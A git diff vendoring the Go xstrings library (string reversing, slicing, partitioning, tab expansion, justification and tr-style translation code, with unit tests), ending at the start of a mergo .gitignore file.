diff --git a/vendor/github.com/huandu/xstrings/format_test.go b/vendor/github.com/huandu/xstrings/format_test.go
new file mode 100644
index 0000000000..54102110ad
--- /dev/null
+++ b/vendor/github.com/huandu/xstrings/format_test.go
@@ -0,0 +1,100 @@
+// Copyright 2015 Huan Du. All rights reserved.
+// Licensed under the MIT license that can be found in the LICENSE file.
+
+package xstrings
+
+import (
+	"strconv"
+	"strings"
+	"testing"
+)
+
+func TestExpandTabs(t *testing.T) {
+	runner := func(str string) (result string) {
+		defer func() {
+			if e := recover(); e != nil {
+				result = e.(string)
+			}
+		}()
+
+		input := strings.Split(str, separator)
+		n, _ := strconv.Atoi(input[1])
+		return ExpandTabs(input[0], n)
+	}
+
+	runTestCases(t, runner, _M{
+		sep("a\tbc\tdef\tghij\tk", "4"): "a   bc  def ghij    k",
+		sep("abcdefg\thij\nk\tl", "4"):  "abcdefg hij\nk   l",
+		sep("z中\t文\tw", "4"):            "z中 文  w",
+		sep("abcdef", "4"):              "abcdef",
+
+		sep("abc\td\tef\tghij\nk\tl", "3"): "abc   d  ef ghij\nk  l",
+		sep("abc\td\tef\tghij\nk\tl", "1"): "abc d ef ghij\nk l",
+
+		sep("abc", "0"):  "tab size must be positive",
+		sep("abc", "-1"): "tab size must be positive",
+	})
+}
+
+func TestLeftJustify(t *testing.T) {
+	runner := func(str string) string {
+		input := strings.Split(str, separator)
+		n, _ := strconv.Atoi(input[1])
+		return LeftJustify(input[0], n, input[2])
+	}
+
+	runTestCases(t, runner, _M{
+		sep("hello", "4", " "):    "hello",
+		sep("hello", "10", " "):   "hello     ",
+		sep("hello", "10", "123"): "hello12312",
+
+		sep("hello中文test", "4", " "):    "hello中文test",
+		sep("hello中文test", "12", " "):   "hello中文test ",
+		sep("hello中文test", "18", "测试！"): "hello中文test测试！测试！测",
+
+		sep("hello中文test", "0", "123"): "hello中文test",
+		sep("hello中文test", "18", ""):   "hello中文test",
+	})
+}
+
+func TestRightJustify(t *testing.T) {
+	runner := func(str string) string {
+		input := strings.Split(str, separator)
+		n, _ := strconv.Atoi(input[1])
+		return RightJustify(input[0], n, input[2])
+	}
+
+	runTestCases(t, runner, _M{
+		sep("hello", "4", " "):    "hello",
+		sep("hello", "10", " "):   "     hello",
+		sep("hello", "10", "123"): "12312hello",
+
+		sep("hello中文test", "4", " "):    "hello中文test",
+		sep("hello中文test", "12", " "):   " hello中文test",
+		sep("hello中文test", "18", "测试！"): "测试！测试！测hello中文test",
+
+		sep("hello中文test", "0", "123"): "hello中文test",
+		sep("hello中文test", "18", ""):   "hello中文test",
+	})
+}
+
+func TestCenter(t *testing.T) {
+	runner := func(str string) string {
+		input := strings.Split(str, separator)
+		n, _ := strconv.Atoi(input[1])
+		return Center(input[0], n, input[2])
+	}
+
+	runTestCases(t, runner, _M{
+		sep("hello", "4", " "):    "hello",
+		sep("hello", "10", " "):   "  hello   ",
+		sep("hello", "10", "123"): "12hello123",
+
+		sep("hello中文test", "4", " "):    "hello中文test",
+		sep("hello中文test", "12", " "):   "hello中文test ",
+		sep("hello中文test", "18", "测试！"): "测试！hello中文test测试！测",
+
+		sep("hello中文test", "0", "123"): "hello中文test",
+		sep("hello中文test", "18", ""):   "hello中文test",
+	})
+}
diff --git a/vendor/github.com/huandu/xstrings/manipulate.go b/vendor/github.com/huandu/xstrings/manipulate.go
new file mode 100644
index 0000000000..0eefb43ed7
--- /dev/null
+++ b/vendor/github.com/huandu/xstrings/manipulate.go
@@ -0,0 +1,217 @@
+// Copyright 2015 Huan Du. All rights reserved.
+// Licensed under the MIT license that can be found in the LICENSE file.
+
+package xstrings
+
+import (
+	"bytes"
+	"strings"
+	"unicode/utf8"
+)
+
+// Reverse a utf8 encoded string.
+func Reverse(str string) string {
+	var size int
+
+	tail := len(str)
+	buf := make([]byte, tail)
+	s := buf
+
+	for len(str) > 0 {
+		_, size = utf8.DecodeRuneInString(str)
+		tail -= size
+		s = append(s[:tail], []byte(str[:size])...)
+		str = str[size:]
+	}
+
+	return string(buf)
+}
+
+// Slice a string by rune.
+//
+// Start must satisfy 0 <= start <= rune length.
+//
+// End can be positive, zero or negative.
+// If end >= 0, start and end must satisfy start <= end <= rune length.
+// If end < 0, it means slice to the end of string.
+//
+// Otherwise, Slice will panic as out of range.
+func Slice(str string, start, end int) string {
+	var size, startPos, endPos int
+
+	origin := str
+
+	if start < 0 || end > len(str) || (end >= 0 && start > end) {
+		panic("out of range")
+	}
+
+	if end >= 0 {
+		end -= start
+	}
+
+	for start > 0 && len(str) > 0 {
+		_, size = utf8.DecodeRuneInString(str)
+		start--
+		startPos += size
+		str = str[size:]
+	}
+
+	if end < 0 {
+		return origin[startPos:]
+	}
+
+	endPos = startPos
+
+	for end > 0 && len(str) > 0 {
+		_, size = utf8.DecodeRuneInString(str)
+		end--
+		endPos += size
+		str = str[size:]
+	}
+
+	if len(str) == 0 && (start > 0 || end > 0) {
+		panic("out of range")
+	}
+
+	return origin[startPos:endPos]
+}
+
+// Partition splits a string by sep into three parts.
+// The return value is a slice of strings with head, match and tail.
+//
+// If str contains sep, for example "hello" and "l", Partition returns
+//     "he", "l", "lo"
+//
+// If str doesn't contain sep, for example "hello" and "x", Partition returns
+//     "hello", "", ""
+func Partition(str, sep string) (head, match, tail string) {
+	index := strings.Index(str, sep)
+
+	if index == -1 {
+		head = str
+		return
+	}
+
+	head = str[:index]
+	match = str[index : index+len(sep)]
+	tail = str[index+len(sep):]
+	return
+}
+
+// LastPartition splits a string by last instance of sep into three parts.
+// The return value is a slice of strings with head, match and tail.
+//
+// If str contains sep, for example "hello" and "l", LastPartition returns
+//     "hel", "l", "o"
+//
+// If str doesn't contain sep, for example "hello" and "x", LastPartition returns
+//     "", "", "hello"
+func LastPartition(str, sep string) (head, match, tail string) {
+	index := strings.LastIndex(str, sep)
+
+	if index == -1 {
+		tail = str
+		return
+	}
+
+	head = str[:index]
+	match = str[index : index+len(sep)]
+	tail = str[index+len(sep):]
+	return
+}
+
+// Insert src into dst at given rune index.
+// Index is counted by runes instead of bytes.
+//
+// If index is out of range of dst, panic with out of range.
+func Insert(dst, src string, index int) string {
+	return Slice(dst, 0, index) + src + Slice(dst, index, -1)
+}
+
+// Scrub scrubs invalid utf8 bytes with repl string.
+// Adjacent invalid bytes are replaced only once.
+func Scrub(str, repl string) string {
+	var buf *bytes.Buffer
+	var r rune
+	var size, pos int
+	var hasError bool
+
+	origin := str
+
+	for len(str) > 0 {
+		r, size = utf8.DecodeRuneInString(str)
+
+		if r == utf8.RuneError {
+			if !hasError {
+				if buf == nil {
+					buf = &bytes.Buffer{}
+				}
+
+				buf.WriteString(origin[:pos])
+				hasError = true
+			}
+		} else if hasError {
+			hasError = false
+			buf.WriteString(repl)
+
+			origin = origin[pos:]
+			pos = 0
+		}
+
+		pos += size
+		str = str[size:]
+	}
+
+	if buf != nil {
+		buf.WriteString(origin)
+		return buf.String()
+	}
+
+	// No invalid byte.
+	return origin
+}
+
+// WordSplit splits a string into words. Returns a slice of words.
+// If there is no word in a string, return nil.
+//
+// Word is defined as a locale dependent string containing alphabetic characters,
+// which may also contain but not start with `'` and `-` characters.
+func WordSplit(str string) []string {
+	var word string
+	var words []string
+	var r rune
+	var size, pos int
+
+	inWord := false
+
+	for len(str) > 0 {
+		r, size = utf8.DecodeRuneInString(str)
+
+		switch {
+		case isAlphabet(r):
+			if !inWord {
+				inWord = true
+				word = str
+				pos = 0
+			}
+
+		case inWord && (r == '\'' || r == '-'):
+			// Still in word.
+
+		default:
+			if inWord {
+				inWord = false
+				words = append(words, word[:pos])
+			}
+		}
+
+		pos += size
+		str = str[size:]
+	}
+
+	if inWord {
+		words = append(words, word[:pos])
+	}
+
+	return words
+}
diff --git a/vendor/github.com/huandu/xstrings/manipulate_test.go b/vendor/github.com/huandu/xstrings/manipulate_test.go
new file mode 100644
index 0000000000..39d413742b
--- /dev/null
+++ b/vendor/github.com/huandu/xstrings/manipulate_test.go
@@ -0,0 +1,142 @@
+// Copyright 2015 Huan Du. All rights reserved.
+// Licensed under the MIT license that can be found in the LICENSE file.
+
+package xstrings
+
+import (
+	"strconv"
+	"strings"
+	"testing"
+)
+
+func TestReverse(t *testing.T) {
+	runTestCases(t, Reverse, _M{
+		"reverse string": "gnirts esrever",
+		"中文如何？":          "？何如文中",
+		"中en文混~排怎样？a":    "a？样怎排~混文ne中",
+	})
+}
+
+func TestSlice(t *testing.T) {
+	runner := func(str string) (result string) {
+		defer func() {
+			if e := recover(); e != nil {
+				result = e.(string)
+			}
+		}()
+
+		strs := split(str)
+		start, _ := strconv.ParseInt(strs[1], 10, 0)
+		end, _ := strconv.ParseInt(strs[2], 10, 0)
+
+		result = Slice(strs[0], int(start), int(end))
+		return
+	}
+
+	runTestCases(t, runner, _M{
+		sep("abcdefghijk", "3", "8"):      "defgh",
+		sep("来点中文如何？", "2", "7"):          "中文如何？",
+		sep("中en文混~排总是少不了的a", "2", "8"):   "n文混~排总",
+		sep("中en文混~排总是少不了的a", "0", "0"):   "",
+		sep("中en文混~排总是少不了的a", "14", "14"): "",
+		sep("中en文混~排总是少不了的a", "5", "-1"):  "~排总是少不了的a",
+		sep("中en文混~排总是少不了的a", "14", "-1"): "",
+
+		sep("let us slice out of range", "-3", "3"): "out of range",
+		sep("超出范围哦", "2", "6"):                      "out of range",
+		sep("don't do this", "3", "2"):              "out of range",
+		sep("千gan万de不piao要liang", "19", "19"):       "out of range",
+	})
+}
+
+func TestPartition(t *testing.T) {
+	runner := func(str string) string {
+		input := strings.Split(str, separator)
+		head, match, tail := Partition(input[0], input[1])
+		return sep(head, match, tail)
+	}
+
+	runTestCases(t, runner, _M{
+		sep("hello", "l"):           sep("he", "l", "lo"),
+		sep("中文总少不了", "少"):          sep("中文总", "少", "不了"),
+		sep("z这个zh英文混排hao不", "h英文"): sep("z这个z", "h英文", "混排hao不"),
+		sep("边界tiao件zen能忘", "边界"):   sep("", "边界", "tiao件zen能忘"),
+		sep("尾巴ye别忘le", "忘le"):      sep("尾巴ye别", "忘le", ""),
+
+		sep("hello", "x"):     sep("hello", "", ""),
+		sep("不是晩香玉", "晚"):     sep("不是晩香玉", "", ""), // Hint: 晩 is not 晚 :)
+		sep("来ge混排ba", "e 混"): sep("来ge混排ba", "", ""),
+	})
+}
+
+func TestLastPartition(t *testing.T) {
+	runner := func(str string) string {
+		input := strings.Split(str, separator)
+		head, match, tail := LastPartition(input[0], input[1])
+		return sep(head, match, tail)
+	}
+
+	runTestCases(t, runner, _M{
+		sep("hello", "l"):               sep("hel", "l", "o"),
+		sep("少量中文总少不了", "少"):            sep("少量中文总", "少", "不了"),
+		sep("z这个zh英文ch英文混排hao不", "h英文"): sep("z这个zh英文c", "h英文", "混排hao不"),
+		sep("边界tiao件zen能忘边界", "边界"):     sep("边界tiao件zen能忘", "边界", ""),
+		sep("尾巴ye别忘le", "尾巴"):           sep("", "尾巴", "ye别忘le"),
+
+		sep("hello", "x"):     sep("", "", "hello"),
+		sep("不是晩香玉", "晚"):     sep("", "", "不是晩香玉"), // Hint: 晩 is not 晚 :)
+		sep("来ge混排ba", "e 混"): sep("", "", "来ge混排ba"),
+	})
+}
+
+func TestInsert(t *testing.T) {
+	runner := func(str string) (result string) {
+		defer func() {
+			if e := recover(); e != nil {
+				result = e.(string)
+			}
+		}()
+
+		strs := split(str)
+		index, _ := strconv.ParseInt(strs[2], 10, 0)
+		result = Insert(strs[0], strs[1], int(index))
+		return
+	}
+
+	runTestCases(t, runner, _M{
+		sep("abcdefg", "hi", "3"):    "abchidefg",
+		sep("少量中文是必须的", "混pai", "4"): "少量中文混pai是必须的",
+		sep("zh英文hun排", "~！", "5"):   "zh英文h~！un排",
+		sep("插在begining", "我", "0"):  "我插在begining",
+		sep("插在ending", "我", "8"):    "插在ending我",
+
+		sep("超tian出yuan边tu界po", "foo", "-1"): "out of range",
+		sep("超tian出yuan边tu界po", "foo", "17"): "out of range",
+	})
+}
+
+func TestScrub(t *testing.T) {
+	runner := func(str string) string {
+		strs := split(str)
+		return Scrub(strs[0], strs[1])
+	}
+
+	runTestCases(t, runner, _M{
+		sep("ab\uFFFDcd\xFF\xCEefg\xFF\xFC\xFD\xFAhijk", "*"): "ab*cd*efg*hijk",
+		sep("no错误です", "*"):                                    "no错误です",
+		sep("", "*"):                                          "",
+	})
+}
+
+func TestWordSplit(t *testing.T) {
+	runner := func(str string) string {
+		return sep(WordSplit(str)...)
+	}
+
+	runTestCases(t, runner, _M{
+		"one word":                   sep("one", "word"),
+		"一个字：把他给我拿下！":                "",
+		"it's a super-fancy one!!!a": sep("it's", "a", "super-fancy", "one", "a"),
+		"a -b-c' 'd'e":               sep("a", "b-c'", "d'e"),
+	})
+}
diff --git a/vendor/github.com/huandu/xstrings/translate.go b/vendor/github.com/huandu/xstrings/translate.go
new file mode 100644
index 0000000000..d86a4cbbd3
--- /dev/null
+++ b/vendor/github.com/huandu/xstrings/translate.go
@@ -0,0 +1,547 @@
+// Copyright 2015 Huan Du. All rights reserved.
+// Licensed under the MIT license that can be found in the LICENSE file.
+
+package xstrings
+
+import (
+	"bytes"
+	"unicode"
+	"unicode/utf8"
+)
+
+type runeRangeMap struct {
+	FromLo rune // Lower bound of range map.
+	FromHi rune // An inclusive higher bound of range map.
+	ToLo   rune
+	ToHi   rune
+}
+
+type runeDict struct {
+	Dict [unicode.MaxASCII + 1]rune
+}
+
+type runeMap map[rune]rune
+
+// Translator can translate string with pre-compiled from and to patterns.
+// If a from/to pattern pair needs to be used more than once, it's recommended
+// to create a Translator and reuse it.
+type Translator struct {
+	quickDict  *runeDict       // A quick dictionary to look up rune by index. Only availabe for latin runes.
+	runeMap    runeMap         // Rune map for translation.
+	ranges     []*runeRangeMap // Ranges of runes.
+	mappedRune rune            // If mappedRune >= 0, all matched runes are translated to the mappedRune.
+	reverted   bool            // If to pattern is empty, all matched characters will be deleted.
+	hasPattern bool
+}
+
+// NewTranslator creates new Translator through a from/to pattern pair.
+func NewTranslator(from, to string) *Translator {
+	tr := &Translator{}
+
+	if from == "" {
+		return tr
+	}
+
+	reverted := from[0] == '^'
+	deletion := len(to) == 0
+
+	if reverted {
+		from = from[1:]
+	}
+
+	var fromStart, fromEnd, fromRangeStep rune
+	var toStart, toEnd, toRangeStep rune
+	var fromRangeSize, toRangeSize rune
+	var singleRunes []rune
+
+	// Update the to rune range.
+	updateRange := func() {
+		// No more rune to read in the to rune pattern.
+		if toEnd == utf8.RuneError {
+			return
+		}
+
+		if toRangeStep == 0 {
+			to, toStart, toEnd, toRangeStep = nextRuneRange(to, toEnd)
+			return
+		}
+
+		// Current range is not empty. Consume 1 rune from start.
+		if toStart != toEnd {
+			toStart += toRangeStep
+			return
+		}
+
+		// No more rune. Repeat the last rune.
+		if to == "" {
+			toEnd = utf8.RuneError
+			return
+		}
+
+		// Both start and end are used. Read two more runes from the to pattern.
+		to, toStart, toEnd, toRangeStep = nextRuneRange(to, utf8.RuneError)
+	}
+
+	if deletion {
+		toStart = utf8.RuneError
+		toEnd = utf8.RuneError
+	} else {
+		// If from pattern is reverted, only the last rune in the to pattern will be used.
+		if reverted {
+			var size int
+
+			for len(to) > 0 {
+				toStart, size = utf8.DecodeRuneInString(to)
+				to = to[size:]
+			}
+
+			toEnd = utf8.RuneError
+		} else {
+			to, toStart, toEnd, toRangeStep = nextRuneRange(to, utf8.RuneError)
+		}
+	}
+
+	fromEnd = utf8.RuneError
+
+	for len(from) > 0 {
+		from, fromStart, fromEnd, fromRangeStep = nextRuneRange(from, fromEnd)
+
+		// fromStart is a single character. Just map it with a rune in the to pattern.
+		if fromRangeStep == 0 {
+			singleRunes = tr.addRune(fromStart, toStart, singleRunes)
+			updateRange()
+			continue
+		}
+
+		for toEnd != utf8.RuneError && fromStart != fromEnd {
+			// If mapped rune is a single character instead of a range, simply shift first
+			// rune in the range.
+			if toRangeStep == 0 {
+				singleRunes = tr.addRune(fromStart, toStart, singleRunes)
+				updateRange()
+				fromStart += fromRangeStep
+				continue
+			}
+
+			fromRangeSize = (fromEnd - fromStart) * fromRangeStep
+			toRangeSize = (toEnd - toStart) * toRangeStep
+
+			// Not enough runes in the to pattern. Need to read more.
+			if fromRangeSize > toRangeSize {
+				fromStart, toStart = tr.addRuneRange(fromStart, fromStart+toRangeSize*fromRangeStep, toStart, toEnd, singleRunes)
+				fromStart += fromRangeStep
+				updateRange()
+
+				// Edge case: If fromRangeSize == toRangeSize + 1, the last fromStart value needs be considered
+				// as a single rune.
+				if fromStart == fromEnd {
+					singleRunes = tr.addRune(fromStart, toStart, singleRunes)
+					updateRange()
+				}
+
+				continue
+			}
+
+			fromStart, toStart = tr.addRuneRange(fromStart, fromEnd, toStart, toStart+fromRangeSize*toRangeStep, singleRunes)
+			updateRange()
+			break
+		}
+
+		if fromStart == fromEnd {
+			fromEnd = utf8.RuneError
+			continue
+		}
+
+		fromStart, toStart = tr.addRuneRange(fromStart, fromEnd, toStart, toStart, singleRunes)
+		fromEnd = utf8.RuneError
+	}
+
+	if fromEnd != utf8.RuneError {
+		singleRunes = tr.addRune(fromEnd, toStart, singleRunes)
+	}
+
+	tr.reverted = reverted
+	tr.mappedRune = -1
+	tr.hasPattern = true
+
+	// Translate RuneError only if in deletion or reverted mode.
+	if deletion || reverted {
+		tr.mappedRune = toStart
+	}
+
+	return tr
+}
+
+func (tr *Translator) addRune(from, to rune, singleRunes []rune) []rune {
+	if from <= unicode.MaxASCII {
+		if tr.quickDict == nil {
+			tr.quickDict = &runeDict{}
+		}
+
+		tr.quickDict.Dict[from] = to
+	} else {
+		if tr.runeMap == nil {
+			tr.runeMap = make(runeMap)
+		}
+
+		tr.runeMap[from] = to
+	}
+
+	singleRunes = append(singleRunes, from)
+	return singleRunes
+}
+
+func (tr *Translator) addRuneRange(fromLo, fromHi, toLo, toHi rune, singleRunes []rune) (rune, rune) {
+	var r rune
+	var rrm *runeRangeMap
+
+	if fromLo < fromHi {
+		rrm = &runeRangeMap{
+			FromLo: fromLo,
+			FromHi: fromHi,
+			ToLo:   toLo,
+			ToHi:   toHi,
+		}
+	} else {
+		rrm = &runeRangeMap{
+			FromLo: fromHi,
+			FromHi: fromLo,
+			ToLo:   toHi,
+			ToHi:   toLo,
+		}
+	}
+
+	// If there is any single rune conflicts with this rune range, clear single rune record.
+	for _, r = range singleRunes {
+		if rrm.FromLo <= r && r <= rrm.FromHi {
+			if r <= unicode.MaxASCII {
+				tr.quickDict.Dict[r] = 0
+			} else {
+				delete(tr.runeMap, r)
+			}
+		}
+	}
+
+	tr.ranges = append(tr.ranges, rrm)
+	return fromHi, toHi
+}
+
+func nextRuneRange(str string, last rune) (remaining string, start, end rune, rangeStep rune) {
+	var r rune
+	var size int
+
+	remaining = str
+	escaping := false
+	isRange := false
+
+	for len(remaining) > 0 {
+		r, size = utf8.DecodeRuneInString(remaining)
+		remaining = remaining[size:]
+
+		// Parse special characters.
+		if !escaping {
+			if r == '\\' {
+				escaping = true
+				continue
+			}
+
+			if r == '-' {
+				// Ignore slash at beginning of string.
+				if last == utf8.RuneError {
+					continue
+				}
+
+				start = last
+				isRange = true
+				continue
+			}
+		}
+
+		escaping = false
+
+		if last != utf8.RuneError {
+			// This is a range which start and end are the same.
+			// Considier it as a normal character.
+			if isRange && last == r {
+				isRange = false
+				continue
+			}
+
+			start = last
+			end = r
+
+			if isRange {
+				if start < end {
+					rangeStep = 1
+				} else {
+					rangeStep = -1
+				}
+			}
+
+			return
+		}
+
+		last = r
+	}
+
+	start = last
+	end = utf8.RuneError
+	return
+}
+
+// Translate str with a from/to pattern pair.
+//
+// See comment in Translate function for usage and samples.
+func (tr *Translator) Translate(str string) string {
+	if !tr.hasPattern || str == "" {
+		return str
+	}
+
+	var r rune
+	var size int
+	var needTr bool
+
+	orig := str
+
+	var output *bytes.Buffer
+
+	for len(str) > 0 {
+		r, size = utf8.DecodeRuneInString(str)
+		r, needTr = tr.TranslateRune(r)
+
+		if needTr && output == nil {
+			output = allocBuffer(orig, str)
+		}
+
+		if r != utf8.RuneError && output != nil {
+			output.WriteRune(r)
+		}
+
+		str = str[size:]
+	}
+
+	// No character is translated.
+	if output == nil {
+		return orig
+	}
+
+	return output.String()
+}
+
+// TranslateRune return translated rune and true if r matches the from pattern.
+// If r doesn't match the pattern, original r is returned and translated is false.
+func (tr *Translator) TranslateRune(r rune) (result rune, translated bool) {
+	switch {
+	case tr.quickDict != nil:
+		if r <= unicode.MaxASCII {
+			result = tr.quickDict.Dict[r]
+
+			if result != 0 {
+				translated = true
+
+				if tr.mappedRune >= 0 {
+					result = tr.mappedRune
+				}
+
+				break
+			}
+		}
+
+		fallthrough
+
+	case tr.runeMap != nil:
+		var ok bool
+
+		if result, ok = tr.runeMap[r]; ok {
+			translated = true
+
+			if tr.mappedRune >= 0 {
+				result = tr.mappedRune
+			}
+
+			break
+		}
+
+		fallthrough
+
+	default:
+		var rrm *runeRangeMap
+		ranges := tr.ranges
+
+		for i := len(ranges) - 1; i >= 0; i-- {
+			rrm = ranges[i]
+
+			if rrm.FromLo <= r && r <= rrm.FromHi {
+				translated = true
+
+				if tr.mappedRune >= 0 {
+					result = tr.mappedRune
+					break
+				}
+
+				if rrm.ToLo < rrm.ToHi {
+					result = rrm.ToLo + r - rrm.FromLo
+				} else if rrm.ToLo > rrm.ToHi {
+					// ToHi can be smaller than ToLo if range is from higher to lower.
+					result = rrm.ToLo - r + rrm.FromLo
+				} else {
+					result = rrm.ToLo
+				}
+
+				break
+			}
+		}
+	}
+
+	if tr.reverted {
+		if !translated {
+			result = tr.mappedRune
+		}
+
+		translated = !translated
+	}
+
+	if !translated {
+		result = r
+	}
+
+	return
+}
+
+// HasPattern returns true if Translator has one pattern at least.
+func (tr *Translator) HasPattern() bool {
+	return tr.hasPattern
+}
+
+// Translate str with the characters defined in from replaced by characters defined in to.
+//
+// From and to are patterns representing a set of characters. Pattern is defined as following.
+//
+//     * Special characters
+//       * '-' means a range of runes, e.g.
+//         * "a-z" means all characters from 'a' to 'z' inclusive;
+//         * "z-a" means all characters from 'z' to 'a' inclusive.
+//       * '^' as first character means a set of all runes excepted listed, e.g.
+//         * "^a-z" means all characters except 'a' to 'z' inclusive.
+//       * '\' escapes special characters.
+//     * Normal character represents itself, e.g. "abc" is a set including 'a', 'b' and 'c'.
+//
+// Translate will try to find a 1:1 mapping from from to to.
+// If to is smaller than from, last rune in to will be used to map "out of range" characters in from.
+//
+// Note that '^' only works in the from pattern. It will be considered as a normal character in the to pattern.
+//
+// If the to pattern is an empty string, Translate works exactly the same as Delete.
+//
+// Samples:
+//     Translate("hello", "aeiou", "12345")    => "h2ll4"
+//     Translate("hello", "a-z", "A-Z")        => "HELLO"
+//     Translate("hello", "z-a", "a-z")        => "svool"
+//     Translate("hello", "aeiou", "*")        => "h*ll*"
+//     Translate("hello", "^l", "*")           => "**ll*"
+//     Translate("hello ^ world", `\^lo`, "*") => "he*** * w*r*d"
+func Translate(str, from, to string) string {
+	tr := NewTranslator(from, to)
+	return tr.Translate(str)
+}
+
+// Delete runes in str matching the pattern.
+// Pattern is defined in Translate function.
+//
+// Samples:
+//     Delete("hello", "aeiou") => "hll"
+//     Delete("hello", "a-k")   => "llo"
+//     Delete("hello", "^a-k")  => "he"
+func Delete(str, pattern string) string {
+	tr := NewTranslator(pattern, "")
+	return tr.Translate(str)
+}
+
+// Count how many runes in str match the pattern.
+// Pattern is defined in Translate function.
+//
+// Samples:
+//     Count("hello", "aeiou") => 3
+//     Count("hello", "a-k")   => 3
+//     Count("hello", "^a-k")  => 2
+func Count(str, pattern string) int {
+	if pattern == "" || str == "" {
+		return 0
+	}
+
+	var r rune
+	var size int
+	var matched bool
+
+	tr := NewTranslator(pattern, "")
+	cnt := 0
+
+	for len(str) > 0 {
+		r, size = utf8.DecodeRuneInString(str)
+		str = str[size:]
+
+		if _, matched = tr.TranslateRune(r); matched {
+			cnt++
+		}
+	}
+
+	return cnt
+}
+
+// Squeeze deletes adjacent repeated runes in str.
+// If pattern is not empty, only runes matching the pattern will be squeezed.
+//
+// Samples:
+//     Squeeze("hello", "")             => "helo"
+//     Squeeze("hello", "m-z")          => "hello"
+//     Squeeze("hello   world", " ")    => "hello world"
+func Squeeze(str, pattern string) string {
+	var last, r rune
+	var size int
+	var skipSqueeze, matched bool
+	var tr *Translator
+	var output *bytes.Buffer
+
+	orig := str
+	last = -1
+
+	if len(pattern) > 0 {
+		tr = NewTranslator(pattern, "")
+	}
+
+	for len(str) > 0 {
+		r, size = utf8.DecodeRuneInString(str)
+
+		// Need to squeeze the str.
+		if last == r && !skipSqueeze {
+			if tr != nil {
+				if _, matched = tr.TranslateRune(r); !matched {
+					skipSqueeze = true
+				}
+			}
+
+			if output == nil {
+				output = allocBuffer(orig, str)
+			}
+
+			if skipSqueeze {
+				output.WriteRune(r)
+			}
+		} else {
+			if output != nil {
+				output.WriteRune(r)
+			}
+
+			last = r
+			skipSqueeze = false
+		}
+
+		str = str[size:]
+	}
+
+	if output == nil {
+		return orig
+	}
+
+	return output.String()
+}
diff --git a/vendor/github.com/huandu/xstrings/translate_test.go b/vendor/github.com/huandu/xstrings/translate_test.go
new file mode 100644
index 0000000000..0a6acb1b93
--- /dev/null
+++ b/vendor/github.com/huandu/xstrings/translate_test.go
@@ -0,0 +1,96 @@
+// Copyright 2015 Huan Du. All rights reserved.
+// Licensed under the MIT license that can be found in the LICENSE file.
+
+package xstrings
+
+import (
+	"fmt"
+	"strings"
+	"testing"
+)
+
+func TestTranslate(t *testing.T) {
+	runner := func(str string) string {
+		input := strings.Split(str, separator)
+		return Translate(input[0], input[1], input[2])
+	}
+
+	runTestCases(t, runner, _M{
+		sep("hello", "aeiou", "12345"):    "h2ll4",
+		sep("hello", "aeiou", ""):         "hll",
+		sep("hello", "a-z", "A-Z"):        "HELLO",
+		sep("hello", "z-a", "a-z"):        "svool",
+		sep("hello", "aeiou", "*"):        "h*ll*",
+		sep("hello", "^l", "*"):           "**ll*",
+		sep("hello", "p-z", "*"):          "hello",
+		sep("hello ^ world", `\^lo`, "*"): "he*** * w*r*d",
+
+		sep("中文字符测试", "文中谁敢试？", "123456"):  "21字符测5",
+		sep("中文字符测试", "^文中谁敢试？", "123456"): "中文666试",
+		sep("中文字符测试", "字-试", "0-9"):        "中90999",
+
+		sep("h1e2l3l4o, w5o6r7l8d", "a-z,0-9", `A-Z\-a-czk-p`):       "HbEcLzLkO- WlOmRnLoD",
+		sep("h1e2l3l4o, w5o6r7l8d", "a-zoh-n", "b-zakt-z"):           "t1f2x3x4k, x5k6s7x8e",
+		sep("h1e2l3l4o, w5o6r7l8d", "helloa-zoh-n", "99999b-zakt-z"): "t1f2x3x4k, x5k6s7x8e",
+
+		sep("hello", "e-", "p"):        "hpllo",
+		sep("hello", "-e-", "p"):       "hpllo",
+		sep("hello", "----e---", "p"):  "hpllo",
+		sep("hello", "^---e----", "p"): "peppp",
+
+		sep("hel\uFFFDlo", "\uFFFD", "H"):    "helHlo",
+		sep("hel\uFFFDlo", "^\uFFFD", "H"):   "HHHHH",
+		sep("hel\uFFFDlo", "o-\uFFFDh", "H"): "HelHlH",
+	})
+}
+
+func TestDelete(t *testing.T) {
+	runner := func(str string) string {
+		input := strings.Split(str, separator)
+		return Delete(input[0], input[1])
+	}
+
+	runTestCases(t, runner, _M{
+		sep("hello", "aeiou"): "hll",
+		sep("hello", "a-k"):   "llo",
+		sep("hello", "^a-k"):  "he",
+
+		sep("中文字符测试", "文中谁敢试？"): "字符测",
+	})
+}
+
+func TestCount(t *testing.T) {
+	runner := func(str string) string {
+		input := strings.Split(str, separator)
+		return fmt.Sprint(Count(input[0], input[1]))
+	}
+
+	runTestCases(t, runner, _M{
+		sep("hello", "aeiou"): "2",
+		sep("hello", "a-k"):   "2",
+		sep("hello", "^a-k"):  "3",
+
+		sep("中文字符测试", "文中谁敢试？"): "3",
+	})
+}
+
+func TestSqueeze(t *testing.T) {
+	runner := func(str string) string {
+		input := strings.Split(str, separator)
+		return Squeeze(input[0], input[1])
+	}
+
+	runTestCases(t, runner, _M{
+		sep("hello", ""):             "helo",
+		sep("hello     world", ""):   "helo world",
+		sep("hello     world", " "):  "hello world",
+		sep("hello     world", "  "): "hello world",
+		sep("hello", "a-k"):          "hello",
+		sep("hello", "^a-k"):         "helo",
+		sep("hello", "^a-l"):         "hello",
+		sep("foooo baaaaar", "a"):    "foooo bar",
+
+		sep("打打打打个劫！！", ""):  "打个劫！",
+		sep("打打打打个劫！！", "打"): "打个劫！！",
+	})
+}
diff --git a/vendor/github.com/huandu/xstrings/util_test.go b/vendor/github.com/huandu/xstrings/util_test.go
new file mode 100644
index 0000000000..1c1bebea00
--- /dev/null
+++ b/vendor/github.com/huandu/xstrings/util_test.go
@@ -0,0 +1,33 @@
+// Copyright 2015 Huan Du. All rights reserved.
+// Licensed under the MIT license that can be found in the LICENSE file.
+
+package xstrings
+
+import (
+	"strings"
+	"testing"
+)
+
+type _M map[string]string
+
+const (
+	separator = " ¶ "
+)
+
+func runTestCases(t *testing.T, converter func(string) string, cases map[string]string) {
+	for k, v := range cases {
+		s := converter(k)
+
+		if s != v {
+			t.Fatalf("case fails. [case:%v]\nshould => %#v\nactual => %#v", k, v, s)
+		}
+	}
+}
+
+func sep(strs ...string) string {
+	return strings.Join(strs, separator)
+}
+
+func split(str string) []string {
+	return strings.Split(str, separator)
+}
diff --git a/vendor/github.com/imdario/mergo/.gitignore b/vendor/github.com/imdario/mergo/.gitignore
new file mode 100644
index 0000000000..529c3412ba
--- /dev/null
+++ b/vendor/github.com/imdario/mergo/.gitignore
@@ -0,0 +1,33 @@
+#### joe made this: http://goel.io/joe
+
+#### go ####
+# Binaries for programs and plugins
+*.exe
